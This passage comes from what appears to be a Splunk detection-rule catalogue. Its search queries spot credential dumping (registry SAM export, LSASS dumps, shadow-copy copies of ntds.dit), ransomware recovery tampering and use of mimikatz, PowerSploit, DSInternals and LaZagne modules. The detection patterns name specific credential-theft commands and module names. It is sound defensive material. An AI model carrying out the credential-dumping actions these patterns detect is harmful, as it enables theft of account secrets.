You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.002 Security Account Manager Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset


version: 4


Attempted credential dump from registry via reg exe

Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-06-04

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where process_name="cmd.exe" OR process_name="reg.exe" | where cmd_line != null AND match_regex(cmd_line, /(?i)save\s+/)=true AND ( match_regex(cmd_line, /(?i)HKLM\\Security/)=true OR match_regex(cmd_line, /(?i)HKLM\\SAM/)=true OR match_regex(cmd_line, /(?i)HKLM\\System/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\Security/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\SAM/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\System/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story


How To Implement

You must be ingesting Windows endpoint data that tracks process activity, including parent-child relationships, from your endpoints.

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Bcdedit failure recovery modification

This search looks for flags passed to bcdedit.exe that modify the built-in Windows error-recovery boot configuration. This is typically used by ransomware to prevent recovery.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1490
  • Last Updated: 2020-12-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_failure_recovery_modification_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. Tune based on parent process names.

Required field

ATT&CK

ID Technique Tactic
T1490 Inhibit System Recovery Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators may modify the boot configuration.

Reference


Test Dataset


version: 1


Batch file write to system32

The search looks for a batch file (.bat) written to the Windows system directory tree.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1204.002
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name values(Filesystem.user) as user from datamodel=Endpoint.Filesystem by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | search file_path=*system32* AND file_extension=.bat | `batch_file_write_to_system32_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1204.002 Malicious File Execution


Kill Chain Phase

  • Delivery


Known False Positives

It is possible for this search to generate a notable event for a batch file write to a path that includes the string "system32", but is not the actual Windows system directory. As such, you should confirm the path of the batch file identified by the search. In addition, a false positive may be generated by an administrator copying a legitimate batch file in this directory tree. You should confirm that the activity is legitimate and modify the search to add exclusions, as necessary.

Reference

Test Dataset


version: 1


Certutil exe certificate extraction

This search looks for arguments to certutil.exe indicating the manipulation or extraction of a certificate. Such a certificate can then be used to sign new authentication tokens, especially inside federated environments such as Windows ADFS.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe Processes.process = "* -exportPFX *" by Processes.parent_process Processes.process_name Processes.process Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_exe_certificate_extraction_filter`

Associated Analytic Story


How To Implement

Required field

Kill Chain Phase

  • Installation


Known False Positives

Unless there are specific use cases, manipulating or exporting certificates using certutil is uncommon. Extraction of certificates has been observed during attacks such as Golden SAML and other campaigns targeting federated services.

Reference

Test Dataset


version: 1


Child processes of spoolsv exe

This search looks for child processes of spoolsv.exe. This activity is associated with a proof-of-concept privilege-escalation exploit for CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1068
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe AND Processes.process_name!=regsvr32.exe by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `child_processes_of_spoolsv_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships, from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model. Update the `child_processes_of_spoolsv_exe_filter` macro to filter out legitimate child processes spawned by spoolsv.exe.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

Some legitimate printer-related processes may show up as children of spoolsv.exe. You should confirm that any such activity is legitimate; confirmed-legitimate processes may be added as exclusions in the search.

Reference

Test Dataset

version: 3


Common ransomware extensions

The search looks for file modifications with extensions commonly used by ransomware.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1485
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | `ransomware_extensions` | `common_ransomware_extensions_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. This search produces fields (`query`, `query_length`, `count`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):

1. Label: Name, Field: Name
2. Label: File Extension, Field: file_extension

Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1485 Data Destruction Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is possible for a legitimate file with these extensions to be created. If this is a true ransomware attack, there will be a large number of files created with these extensions.

Reference

Test Dataset


version: 4


Common ransomware notes

The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1485
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_notes` | `common_ransomware_notes_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records file-system activity from your hosts to populate the Endpoint Filesystem data-model node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

ATT&CK

ID Technique Tactic
T1485 Data Destruction Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a legitimate file could be created with the same name used by ransomware note files.

Reference

Test Dataset


version: 4


Create remote thread into lsass

Detect remote thread creation into LSASS consistent with credential dumping.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventCode=8 TargetImage=*lsass.exe | stats count min(_time) as firstTime max(_time) as lastTime by Computer, EventCode, TargetImage, TargetProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_remote_thread_into_lsass_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs with a Sysmon configuration, which includes EventCode 8 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools can access LSASS for legitimate reasons and generate an event. In these cases, tweaking the search may help eliminate noise.

Reference


Test Dataset


version: 1


Create local admin accounts using net exe

This search looks for the creation of local administrator accounts using net.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1136.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) AND (Processes.process=*localgroup* OR Processes.process=*/add* OR Processes.process=*user*) by Processes.process Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_local_admin_accounts_using_net_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1136.001 Local Account Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators often leverage net.exe to create admin accounts.

Reference

Test Dataset


version: 4


Create or delete windows shares using net exe

This search looks for the creation or deletion of hidden shares using net.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1070.005
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) by Processes.process Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1070.005 Network Share Connection Removal Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators often leverage net.exe to create or delete network shares. You should verify that the activity was intentional and is legitimate.

Reference


Test Dataset


version: 5


Creation of shadow copy

Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe Processes.process=*shadowcopy* Processes.process=*create*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate administrator usage of Vssadmin or Wmic will create false positives.

Reference


Test Dataset


version: 1


Creation of shadow copy with wmic and powershell

This search detects the use of wmic and Powershell to create a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic* OR Processes.process_name=powershell* Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process information that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate administrator usage of wmic to create a shadow copy will create false positives.

Reference


Test Dataset


version: 1


Creation of lsass dump with taskmgr

Detect the hands-on-keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. When this occurs, a file write/modification takes place in the user's profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed; however, if the dump occurs more than once, it will be named lsass (2).dmp.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2020-02-03

Search

`sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp | stats count min(_time) as firstTime max(_time) as lastTime by Computer, object_category, process_name, TargetFilename | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_lsass_dump_with_taskmgr_filter`

Associated Analytic Story


How To Implement

This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 11 for detecting file create of lsass.dmp. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual.

Reference


Test Dataset


version: 1


Credential dumping via copy command from shadow copy

This search detects credential dumping using copy command from a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe (Processes.process=*\\system32\\config\\sam* OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system* OR Processes.process=*\\windows\\ntds\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 1


Credential dumping via symlink to shadow copy

This search detects the creation of a symlink to a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 1


Credential extraction indicative of fgdump and cachedump with s option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. FGdump is a newer version of the pwdump tool that extracts NTLM and LanMan password hashes from Windows. Cachedump is a publicly available tool that extracts cached password hashes from a system's registry.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND process_name != null AND parent_process_name != null AND match_regex(parent_process_name, /(?i)System32\\services.exe/)=true AND match_regex(process_name, /(?i)cachedump\d{0,2}.exe/)=true AND match_regex(process_path, /(?i)\\Temp/)=true AND match_regex(cmd_line, /(?i)\-s/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of fgdump and cachedump with v option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. FGdump is a newer version of the pwdump tool that extracts NTLM and LanMan password hashes from Windows. Cachedump is a publicly available tool that extracts cached password hashes from a system's registry.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null) | where cmd_line != null AND process_name != null AND process_path != null AND match_regex(process_name, /(?i)cachedump\d{0,2}.exe/)=true AND match_regex(process_path, /(?i)\\Temp/)=true AND match_regex(cmd_line, /(?i)\-v/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of lazagne command line options

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. LaZagne is a tool that extracts various kinds of credentials from a local computer, including account passwords, domain passwords, browser passwords, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003, T1555
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND match_regex(cmd_line, /(?i)all\s+\-oA\s+\-output/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access
T1555 Credentials from Password Stores Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of use of dsinternals credential conversion modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. DSInternals is a collection of PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)ConvertFrom-ADManagedPasswordBlob/)=true OR match_regex(cmd_line, /(?i)ConvertFrom-GPPrefPassword/)=true OR match_regex(cmd_line, /(?i)ConvertFrom-UnicodePassword/)=true OR match_regex(cmd_line, /(?i)ConvertTo-GPPrefPassword/)=true OR match_regex(cmd_line, /(?i)ConvertTo-KerberosKey/)=true OR match_regex(cmd_line, /(?i)ConvertTo-LMHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-NTHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-OrgIdHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-UnicodePassword/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of dsinternals modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. DSInternals is a collection of PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ADDBBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-ADDBDomainController/)=true OR match_regex(cmd_line, /(?i)Get-ADDBKdsRootKey/)=true OR match_regex(cmd_line, /(?i)Get-ADDBSchemaAttribute/)=true OR match_regex(cmd_line, /(?i)Get-ADKeyCredential/)=true OR match_regex(cmd_line, /(?i)Get-ADReplAccount/)=true OR match_regex(cmd_line, /(?i)Get-ADReplBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-ADSIAccount/)=true OR match_regex(cmd_line, /(?i)Get-AzureADUserEx/)=true OR match_regex(cmd_line, /(?i)Get-BootKey/)=true OR match_regex(cmd_line, /(?i)Get-LsaBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-LsaPolicyInformation/)=true OR match_regex(cmd_line, /(?i)Get-SamPasswordPolicy/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of mimikatz modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Mimikatz is a collection of tools and modules commonly employed in Windows exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)CRYPTO::Certificates/)=true OR match_regex(cmd_line, /(?i)CRYPTO::keys/)=true OR match_regex(cmd_line, /(?i)kerberos::list/)=true OR match_regex(cmd_line, /(?i)kerberos::tgt/)=true OR match_regex(cmd_line, /(?i)lsadump::sam/)=true OR match_regex(cmd_line, /(?i)lsadump::secrets/)=true OR match_regex(cmd_line, /(?i)lsadump::cache/)=true OR match_regex(cmd_line, /(?i)lsadump::lsa/)=true OR match_regex(cmd_line, /(?i)lsadump::trust/)=true OR match_regex(cmd_line, /(?i)lsadump::backupkeys/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of powersploit modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. PowerSploit is a collection of Microsoft PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ApplicationHost/)=true OR match_regex(cmd_line, /(?i)Get-CachedGPPPassword/)=true OR match_regex(cmd_line, /(?i)Get-GPPAutologon/)=true OR match_regex(cmd_line, /(?i)Get-GPPPassword/)=true OR match_regex(cmd_line, /(?i)Get-RegistryAutoLogon/)=true OR match_regex(cmd_line, /(?i)Get-SiteListPassword/)=true OR match_regex(cmd_line, /(?i)Get-SPNTicket/)=true OR match_regex(cmd_line, /(?i)Request-SPNTicket/)=true OR match_regex(cmd_line, /(?i)Get-VaultCredential/)=true OR match_regex(cmd_line, /(?i)Invoke-Kerberoast/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


